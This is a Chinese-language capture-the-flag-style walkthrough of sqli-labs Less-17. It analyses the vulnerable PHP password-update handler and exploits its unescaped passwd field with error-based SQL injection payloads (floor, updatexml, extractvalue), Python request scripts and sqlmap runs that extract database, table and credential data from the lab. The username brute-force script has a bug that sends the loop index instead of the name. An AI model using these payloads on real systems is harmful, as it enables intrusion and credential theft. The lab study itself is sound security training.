sqli-lab-less17

sqli-lab-less17

一、靶标地址

Less-17 POST-Update Query-Error Based-String
#字符型更新查询报错注入
http://127.0.0.1/sqli/less-17/

二、漏洞探测

猜测业务流程,判断用户名存不存在。存在则更新password,不存在则报错

输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#图片回显更新成功
#盲测时我们是不知道admin/admin的

后续使用其他用户名
#图片回显Bug off you Silly Dumb hacker

在进行多次尝试后暂时无思路

三、源码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0); #关闭错误报告

function check_input($value)
	{
	// Normalises one request parameter before it is interpolated into SQL:
	// a digit-only value becomes an int, anything else becomes a quoted and
	// escaped string literal. The caller interpolates the return value as-is
	// (it must not add its own quotes). In this listing the function is applied
	// to uname only; passwd never passes through it.
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);# keep only the first 15 characters of the input
		}

		// Stripslashes if magic quotes enabled
        // remove the backslashes that magic_quotes_gpc may already have inserted
		if (get_magic_quotes_gpc())
        # get_magic_quotes_gpc() reads the PHP setting magic_quotes_gpc.
        # When it is on, PHP has already prefixed ' (single quote), " (double quote),
        # \ (backslash) and NUL bytes in request data with a backslash.
        # (That setting, and the mysql_* functions used below, no longer exist in current PHP.)
			{
			$value = stripslashes($value);
            # stripslashes() removes the backslashes added by addslashes()/magic quotes,
            # so the value is escaped exactly once below rather than twice.
			}

		// Quote if not a number
        // escape the special characters and wrap the result in single quotes
		if (!ctype_digit($value))
        # ctype_digit() is true only when every character of the string is a decimal digit
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
            # mysql_real_escape_string() escapes the characters that are special inside a MySQL
            # string literal, using the connection opened by the include at the top of the file;
            # the surrounding quotes are added here, which is why the caller adds none.
			}
		
	// NOTE(review): despite the indentation, this else belongs to the
	// ctype_digit() check directly above, not to the empty() check at the top.
	else
		{
		$value = intval($value);
        # intval() turns the digit-only string into an integer, which is then interpolated unquoted
		}
	return $value;
	}

// take the variables
// Request handler: look the submitted username up, and if it exists overwrite
// that user's password with the submitted one. Both branches respond with an
// image only; the database error text, when any, is echoed as well.
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  
# uname has every special character escaped by check_input(), so it is not injectable here
$passwd=$_POST['passwd'];
# NOTE(review): passwd is taken as-is. It does not go through check_input(), so the
# escaping that protects uname does not cover it.


//logging the connection parameters to a file for analysis.
// Appends the submitted username and the new password, in plaintext, to a file
// named by a relative path (resolved against the PHP process's working directory).
// Credentials must never be written to a log like this; a real deployment would drop it.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);


// connectivity 
// $uname is already quoted (or an int) from check_input(), so no quotes are added
// around it. The leading @ suppresses any warning raised while building the string.
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
# the lookup is by uname only; passwd is not checked anywhere in this handler

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		// SQL injection sink: $passwd is interpolated into the statement without
		// escaping or parameterisation ($row1 comes from the database, not the request).
		// The fix is a prepared statement (mysqli/PDO); at minimum $passwd would need
		// the same mysql_real_escape_string() treatment check_input() gives uname.
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);// update the password
  		echo "<br>";
	
	
	
		if (mysql_error())# error raised by the UPDATE just executed
		{
			// The raw MySQL error text is written into the HTTP response. Driver
			// errors belong in a server-side log behind a generic message; returning
			// them to the client exposes statement structure and whatever a failing
			// expression evaluated.
			echo '<font color= "#FFFF00" font size = 3 >';
			print_r(mysql_error());// print the error
			echo "</br></br>";
			echo "</font>";
		}
		else
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			//echo " You password has been successfully updated " ;		
			echo "<br>";
			echo "</font>";
		}
	
		// flag1.jpg is shown only when the username exists; the other branch shows
		// slap1.jpg, so the response alone reveals whether a username is valid.
		echo '<img src="../images/flag1.jpg"   />';	
		//echo 'Your Password:' .$row['password'];
  		echo "</font>";
	


  	}
	else  # no matching user: show the "bug off" image instead
	{
		echo '<font size="4.5" color="#FFFF00">';
		//echo "Bug off you Silly Dumb hacker";
		echo "</br>";
		echo '<img src="../images/slap1.jpg"   />';
	
		echo "</font>";  
	}
}

?>

在这里插入图片描述

根据源码分析的流程图重新梳理fuzz思路

一是会使用select语句查询uname存不存在
二是会使用update语句更新passwd

一是注入uname参数
用户名存在不存在会有回显差异,可尝试布尔盲注
然后也可以尝试时间盲注
二是注入passwd参数
发现update语句报错会显示错误
可尝试bool盲注和报错函数回显

这里我们使用报错函数回显,但是前提是我们爆破出一个合法用户名

四、黑盒与白盒测试

$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

uname=admin&passwd=1'&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1
#admin'

uname=admin&passwd=1"&submit=Submit
#flag

uname=admin&passwd=1')&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' WHERE username='admin'' at line 1
# )' WHERE username='admin'

uname=admin&passwd=1")&submit=Submit
#flag

uname=admin&passwd=1'))&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' WHERE username='admin'' at line 1
# ))' WHERE username='admin'

uname=admin&passwd=1"))&submit=Submit
#flag

#推荐使用脚本探测
#猜测语句为update users set password = '$passwd' WHERE username='$row1';
1、floor()函数报错
#获取数据库 用户 版本号
uname=admin&passwd=1' and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit
#因为update语句无法使用union select,所以用and连接,并将后面的子查询用()括起来

#获取表名
uname=admin&passwd=1' and (select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit

#获取列名
uname=admin&passwd=1' and (select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit

#获取用户名
uname=admin&passwd=1' and (select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit

2、updatexml()函数报错
#获取数据库名
uname=admin&passwd=1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) #&submit=Submit

#获取表名
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) #&submit=Submit 

#获取列名
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) #&submit=Submit

#获取列字段
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),0) #&submit=Submit
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) #&submit=Submit

3、extractvalue()函数报错
uname=1') union &passwd=1&submit=Submit

#获取当前数据库名
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select database()))) #&submit=Submit

#获取表名
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #&submit=Submit

#获取列名
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #&submit=Submit

#获取列字段
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) #&submit=Submit
uname=admin&passwd=1') and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) #&submit=Submit

五、脚本撰写

#爆破合法用户名
# Lab helper: submit each line of ./username.txt as uname (with a fixed passwd)
# and print every response that contains "flag", the marker of the Less-17
# "user exists" page (flag1.jpg is only rendered for a known username).
import requests

url="http://192.168.128.159/sqli/less-17/index.php"
# request headers copied from the browser dev tools (F12) or a proxy capture
header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
# one candidate username per line; the handle is never closed
# (a `with open(...)` block would release it)
file = open("./username.txt","r")
usernames = file.read().splitlines()
# substring that identifies the success response
target_str = "flag"

for i in range(len(usernames)):
    payload = {
            # NOTE(review): `i` is the integer loop index, not the entry read from the file
            "uname" : i,
            "passwd" : "1"
    }
    response=requests.post(url,headers=header,data=payload)
    if target_str in response.text:
        print(response.text)
#进行注入
# Lab helper: send one POST carrying the updatexml() payload shown above in
# passwd and dump the whole response body; the page embeds the MySQL error
# text in the returned HTML, so nothing is parsed out here.
import requests

url="http://192.168.128.159/sqli/less-17/index.php"
# request headers copied from the browser dev tools (F12) or a proxy capture
header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
        'Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
# uname must be an existing user for the UPDATE (and its error) to be reached
payload = {
        "uname" : "admin",
        "passwd" : "1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) #"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)

六、sqlmap

sqlmap -u "http://192.168.128.159/sqli/Less-17/" --data "uname=1&passwd=1&submit=Submit" -p passwd --batch
#探测无结果
sqlmap -r target.txt -p passwd --batch

Parameter: passwd (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=admin&passwd=admin' AND (SELECT 4789 FROM(SELECT COUNT(*),CONCAT(0x71627a6b71,(SELECT (ELT(4789=4789,1))),0x717a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Xiak&submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin&passwd=admin' AND (SELECT 7414 FROM (SELECT(SLEEP(5)))qEWO)-- YjGd&submit=Submit

POST /sqli/less-17/ HTTP/1.1
Host: 192.168.128.159
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.128.159
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-17/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

uname=admin&passwd=admin&submit=Submit

七、总结

1、当第一个参数无法注入时,就需要考虑第二个参数
2、尝试不同的方法
联合查询
报错函数回显
时间盲注
布尔盲注
3、sqlmap的不同使用方式
sqlmap -r target.txt 